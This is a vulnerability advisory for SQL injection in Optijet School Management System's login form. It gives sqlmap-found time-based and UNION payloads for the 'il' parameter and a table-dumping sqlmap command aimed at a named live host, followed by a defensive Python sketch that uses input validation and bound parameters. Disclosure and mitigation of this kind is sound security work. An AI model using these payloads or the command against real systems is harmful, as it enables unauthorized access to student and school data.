Optijet School Management System - Blind SQL Injection (Unauthenticated)

2021.10.20
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Optijet School Management System 1.0 - SQL Injection (Unauthenticated)
# Date: 19.10.2021
# Exploit Author: MaliciousFolder
# Vendor Homepage: http://optijet.net/optijet/index.php?r=kalan
# Version: 1.0
# Tested on: Windows 10 - Ubuntu 20.04.3 LTS
# Vulnerable Parameter: "il"

Optijet, a school management system in Turkey, has an SQL injection vulnerability in its login forms.

PoC:

The "il" parameter on http://localhost/index.php:

il=0&ilce=0&okul=0&sinav=0&sinif=0&ogrno=eXrw&ograd=&ogr=%C3%96%C4%9Frenci Veli Giri%C5%9F

is vulnerable to SQL injection. Here is the sqlmap result:

sqlmap identified the following injection point(s) with a total of 68 HTTP(s) requests:
---
Parameter: il (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: il=0 AND (SELECT 6460 FROM (SELECT(SLEEP(5)))LyGV)&ilce=0&okul=0&sinav=0&sinif=0&ogrno=eXrw&ograd=&ogr=%C3%96%C4%9Frenci Veli Giri%C5%9F

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: il=0 UNION ALL SELECT CONCAT(0x717a627171,0x46774f754d596e6e666d4a71646468726f4a785250754e4d557441416862555344647a6542765a69,0x7176627871),NULL,NULL,NULL-- -&ilce=0&okul=0&sinav=0&sinif=0&ogrno=eXrw&ograd=&ogr=%C3%96%C4%9Frenci Veli Giri%C5%9F
---

sqlmap command to retrieve tables from the DB:

sqlmap.py -u okulpedia.okulsonuc.com --forms --tables
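
A mitigation sketch for the finding above, added here as an example and not taken from the advisory or from Optijet's code: the login form's numeric fields are validated as integers and the lookup uses bound parameters, so both payload types reported by sqlmap are refused before any query runs. The students table, its columns, and all function names are assumptions made for the demonstration; SQLite stands in for the MySQL backend.

```python
import sqlite3
from urllib.parse import parse_qs

# Fields the PoC request sends as plain numbers; "il" is the reported one.
NUMERIC_FIELDS = ("il", "ilce", "okul", "sinav", "sinif")

# BENIGN is the advisory's PoC request body; TIME_BASED is the sqlmap
# time-based payload with the trailing "ogr" field dropped.
BENIGN = ("il=0&ilce=0&okul=0&sinav=0&sinif=0&ogrno=eXrw&ograd="
          "&ogr=%C3%96%C4%9Frenci Veli Giri%C5%9F")
TIME_BASED = ("il=0 AND (SELECT 6460 FROM (SELECT(SLEEP(5)))LyGV)"
              "&ilce=0&okul=0&sinav=0&sinif=0&ogrno=eXrw&ograd=")

def parse_login_form(body):
    """Return typed form values; raise ValueError on a non-numeric ID field."""
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    clean = {"ogrno": form.get("ogrno", "")}
    for name in NUMERIC_FIELDS:
        value = form.get(name, "")
        # ASCII digits only, bounded length: no spaces, operators or keywords.
        if not (value.isascii() and value.isdigit() and len(value) <= 9):
            raise ValueError(f"non-numeric value in field {name!r}")
        clean[name] = int(value)
    return clean

def find_student(db, body):
    """Validated lookup with bound parameters; values never become SQL text."""
    f = parse_login_form(body)
    sql = ("SELECT id, ogrno FROM students "
           "WHERE il = ? AND ilce = ? AND okul = ? AND ogrno = ?")
    return db.execute(sql, (f["il"], f["ilce"], f["okul"], f["ogrno"])).fetchall()

def is_rejected(db, body):
    """True when the request is refused before any query is issued."""
    try:
        find_student(db, body)
    except ValueError:
        return True
    return False

def demo_db():
    """Constructed in-memory table standing in for the application's schema."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE students "
               "(id INTEGER, il INTEGER, ilce INTEGER, okul INTEGER, ogrno TEXT)")
    db.execute("INSERT INTO students VALUES (1, 0, 0, 0, 'eXrw')")
    return db
```

The integer check covers every numeric field, not only "il", since the other IDs in the same form are likely handled the same way; the string field "ogrno" relies on the bound parameter alone.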



Copyright 2021, cxsecurity.com

 
